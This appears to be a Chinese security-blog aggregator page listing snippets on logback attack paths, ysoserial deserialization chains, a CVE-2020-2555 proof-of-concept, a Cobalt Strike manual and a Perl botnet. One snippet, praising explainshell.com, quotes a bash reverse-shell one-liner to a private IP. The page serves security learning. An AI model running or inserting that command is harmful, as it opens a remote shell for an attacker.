日志库logback的攻击路径
logback 是 log4j 创始人设计的另一个开源日志组件,这个组件有一些有趣的攻击路径。
Aggregator
最全资料整理,用python激活2020
5 years 2 months ago
200本python资料,收集、整理、分类、总结。数据人的2020年,正式启动!
最全资料整理,用python激活2020
5 years 2 months ago
200本python资料,收集、整理、分类、总结。数据人的2020年,正式启动!
最全资料整理,用python激活2020
5 years 2 months ago
200本python资料,收集、整理、分类、总结。数据人的2020年,正式启动!
2019年总结 - Afant1
5 years 2 months ago
以后每年写一篇总结吧,放假在家才想起来,今年还没总结。 19年博客上输出了38篇文章,先知上一篇: "https://xz.aliyun.com/t/5257" 。吐司上四篇: "1" , "2" , "3" , "4" 。90sec上一篇: "https://forum.90sec.com/t/t
Afant1
教你一步一步构造CVE-2020-2555 POC - Afant1
5 years 2 months ago
文章首发在安全客: "https://www.anquanke.com/post/id/200384" 1、前言 欸欸欸,不想写论文,起床发现 "https://www.zerodayinitiative.com/blog/2020/3/5/cve 2020 2555 rce through a d
Afant1
Cyber Threats Targeting Asia, Winter 2019
5 years 2 months ago
Asian systems saw a large amount of SMB attack traffic during this time period, mainly driven from in-region IP addresses.
java反序列化-ysoserial-调试分析总结篇(7) - tr1ple
5 years 2 months ago
前言: CommonsCollections7外层也是一条新的构造链,外层由hashtable的readObject进入,这条构造链挺有意思,因为用到了hash碰撞 yso构造分析: 首先构造进行rce所需要的转换链,这里也用的是chianed里面套Constantrans+invoketrans的
tr1ple
java反序列化-ysoserial-调试分析总结篇(6) - tr1ple
5 years 2 months ago
前言: 这篇记录CommonsCollections6的调试,外层也是新的类,换成了hashset,即从hashset触发其readObject(),yso给的调用链如下图所示 利用链分析: 首先在hashset内部首先获取器容量与负载因子等操作,然后创建hashmap,将ObjectinputSt
tr1ple
Cobalt Strike 4.0 手册——献给渗透测试人员的先进威胁战术
5 years 2 months ago
Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目地的攻击和模拟高级威胁者的后渗透行动。本章中会概述 Cobalt Strike 的功能集和相关的攻击流程。在本手册的剩余部分中会详细的讨论这些功能。
Cobalt Strike 4.0 手册——献给渗透测试人员的先进威胁战术
5 years 2 months ago
Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目地的攻击和模拟高级威胁者的后渗透行动。本章中会概述 Cobalt Strike 的功能集和相关的攻击流程。在本手册的剩余部分中会详细的讨论这些功能。
Cobalt Strike 4.0 手册——献给渗透测试人员的先进威胁战术
5 years 2 months ago
Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目地的攻击和模拟高级威胁者的后渗透行动。本章中会概述 Cobalt Strike 的功能集和相关的攻击流程。在本手册的剩余部分中会详细的讨论这些功能。
Cobalt Strike 4.0 手册——献给渗透测试人员的先进威胁战术
5 years 2 months ago
Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目地的攻击和模拟高级威胁者的后渗透行动。本章中会概述 Cobalt Strike 的功能集和相关的攻击流程。在本手册的剩余部分中会详细的讨论这些功能。
Cobalt Strike 4.0 手册——献给渗透测试人员的先进威胁战术
5 years 2 months ago
Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目地的攻击和模拟高级威胁者的后渗透行动。本章中会概述 Cobalt Strike 的功能集和相关的攻击流程。在本手册的剩余部分中会详细的讨论这些功能。
分享个学习shell脚本或辅助理解的网站-explainshell.com
5 years 2 months ago
有的时候我们会遇到一些特别难理解的shell命令,或者是一些参数我们不知道它的作用。那么今天分享的这个网址可以帮助解决上面的烦恼。
网站主页打开后就是一个输入框。输入命令后,就会给出解析的结果。结果包含了解析的结果,并在下面给出了详细的说明。很方便。例如我们以bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 为例(如下图),很酷~
java反序列化-ysoserial-调试分析总结篇(5) - tr1ple
5 years 2 months ago
前言: 这篇文章继续分析commonscollections5,由如下调用链可以看到此时最外层的类不是annotationinvoke,也不是priorityqueue了,变成了badattribute 该类要求没有配置security manager 利用链分析: 首先在badAttribute的
tr1ple
零信任架构远程办公实战
5 years 2 months ago
这次我们把零信任架构真实的用到了大规模远程办公支持中,本文即是对这一次实战的总结,希望对评估零信任架构的人有所帮助。
零信任架构远程办公实战
5 years 2 months ago
这次我们把零信任架构真实的用到了大规模远程办公支持中,本文即是对这一次实战的总结,希望对评估零信任架构的人有所帮助。
零信任架构远程办公实战
5 years 2 months ago
这次我们把零信任架构真实的用到了大规模远程办公支持中,本文即是对这一次实战的总结,希望对评估零信任架构的人有所帮助。
New Perl Botnet (Tuyul) Found with Possible Indonesian Attribution
5 years 2 months ago
Tuyul bot targets vulnerable PHPUnit systems to install an Internet Relay Chat (IRC) bot.